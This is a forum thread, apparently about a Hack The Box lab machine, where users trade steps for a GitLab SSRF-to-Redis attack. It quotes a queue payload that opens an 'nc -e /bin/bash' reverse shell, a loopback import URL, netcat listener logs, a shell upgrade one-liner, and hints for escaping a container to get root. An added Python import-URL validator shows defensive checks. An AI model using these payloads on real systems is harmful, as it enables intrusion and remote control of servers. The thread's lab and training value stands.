December 13, 2020 at 11:39 AM
(December 13, 2020 at 01:28 AM)xxxxxd Wrote: (December 13, 2020 at 01:21 AM)Kali76 Wrote: (December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP*** ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec
Not work ... Response --
HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574
422 Unprocessable Entity, says that your request is not in a correct format.
-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request Can’t replicate this at all for some reason, strange.
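Added example, not part of any post in this thread: a server-side check for repository import URLs of the kind quoted above, where an IPv4-mapped IPv6 literal points the importer at a loopback port and a URL-encoded payload rides along in the URL field. The scheme and port policy, the reason strings and the `resolve` hook are assumptions made for the illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumed policy for a repository importer; adjust to the deployment.
ALLOWED_SCHEMES = {"http", "https", "git", "ssh"}
ALLOWED_PORTS = {None, 22, 80, 443, 9418}
_CTRL = re.compile(r"[\x00-\x20\x7f]")  # control characters and whitespace


def _is_internal(addr):
    ip = ipaddress.ip_address(addr)
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the IPv4 rules apply to it.
    ip = getattr(ip, "ipv4_mapped", None) or ip
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified)


def check_import_url(url, resolve=None):
    """Return the reasons to reject `url`; an empty list means it passed.

    `resolve` is a hypothetical hook: hostname -> iterable of IP strings.
    """
    reasons = []
    # Inspect the raw and percent-decoded text first: urlsplit() in current
    # Python versions drops CR, LF and TAB, hiding an injected line break.
    if _CTRL.search(url) or _CTRL.search(unquote(url)):
        reasons.append("control-character")
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:
        return reasons + ["unparseable"]
    if parts.scheme not in ALLOWED_SCHEMES:
        reasons.append("scheme")
    if port not in ALLOWED_PORTS:
        reasons.append("port")
    if not host:
        return reasons + ["no-host"]
    try:
        targets = [str(ipaddress.ip_address(host))]
    except ValueError:
        # A name, not a literal: judge every address it resolves to.
        targets = list(resolve(host)) if resolve else []
    if any(_is_internal(t) for t in targets):
        reasons.append("internal-address")
    return reasons
```

For hostnames the importer should connect to the same address that was checked, otherwise a second DNS lookup can return a different target.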
December 13, 2020 at 12:14 PM
(December 13, 2020 at 11:39 AM)JustMeAndYou Wrote: (December 13, 2020 at 01:28 AM)xxxxxd Wrote: (December 13, 2020 at 01:21 AM)Kali76 Wrote: (December 13, 2020 at 01:07 AM)xxxxxd Wrote: you can simply use nc like
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash ***IP*** ***PORT*** \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
exec
Not work ... Response --
HTTP/1.1 422 Unprocessable Entity
Server: nginx
Date: Sun, 13 Dec 2020 00:19:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2936
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
X-Request-Id: 2b9bc018-b0c8-4fb4-860b-80c4ae76afee
X-Runtime: 0.019574
422 Unprocessable Entity, says that your request is not in a correct format.
-> new project -> import project -> repo by url -> some name and this url: git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git -> intercept with burp and edit the request as shown here: https://github.com/jas502n/gitlab-SSRF-r...te-request Can’t replicate this at all for some reason, strange.
yes neither do I, I am listening on my docker with netcat but I do not get anything, something wrong, Response---
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Dec 2020 03:14:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, private, must-revalidate, no-store
Etag: W/"566a101f09634a379f862102aebae194"
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Request-Id: be7cf16c-f1f8-4370-928b-f5b849cc4143
X-Runtime: 0.102288
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Content-Length: 50705
December 13, 2020 at 12:17 PM
Don't forget to URL encode it..
December 13, 2020 at 12:28 PM
Guys you can do it without burp, search for liveoverflow article, you can send the whole url encoded payload inside the url field and get a shell !!!
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/
December 13, 2020 at 12:43 PM
This post was last modified: December 13, 2020 at 12:58 PM by geky0. Edited 1 time in total.
Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
December 13, 2020 at 01:11 PM
This post was last modified: December 13, 2020 at 01:23 PM by Kali76. Edited 1 time in total.
(December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
December 13, 2020 at 05:34 PM
1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)
December 13, 2020 at 06:15 PM
This post was last modified: December 13, 2020 at 06:17 PM by 0xvijay. Edited 1 time in total.
(December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls won't work there coz there are no files or folders there
try other commands
whoami and more...
lmao u got shell and only tried ls command there xD
December 13, 2020 at 07:00 PM
(December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls won't work there coz there are no files or folders there
try other commands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
December 13, 2020 at 07:05 PM
(December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls won't work there coz there are no files or folders there
try other commands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
December 13, 2020 at 07:09 PM
(December 13, 2020 at 07:05 PM)0xvijay Wrote: (December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: (December 13, 2020 at 12:43 PM)geky0 Wrote: Any nudges guys?
Managed to change dude/root gitlab password, got nothing there.
Found nothing else
edit: found /root_pass but seems like a rabbit hole
Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls won't work there coz there are no files or folders there
try other commands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
not have a shell, how do i launch it?
December 13, 2020 at 07:15 PM
This post was last modified: December 13, 2020 at 07:16 PM by 0xvijay.
(December 13, 2020 at 07:09 PM)Kali76 Wrote: (December 13, 2020 at 07:05 PM)0xvijay Wrote: (December 13, 2020 at 07:00 PM)Kali76 Wrote: (December 13, 2020 at 06:15 PM)0xvijay Wrote: (December 13, 2020 at 01:11 PM)Kali76 Wrote: Not work /bin/sh
[email protected]:~/Desktop/HacktheBox/Ready# rlwrap nc -nlvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:33814.
ls
My payload:
https://pastebin.com/YWWR9Uq9
python3 -c "import pty;pty.spawn('/bin/bash')";
That's all you've done but ls won't work there coz there are no files or folders there
try other commands
whoami and more...
lmao u got shell and only tried ls command there xD
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59090.
git
python3 -c "import pty;pty.spawn('/bin/bash')";
run this there
not have a shell, how do i launch it?
You can run coz got connected lmao
ok wait I make a detailed writeup for u soon for user + root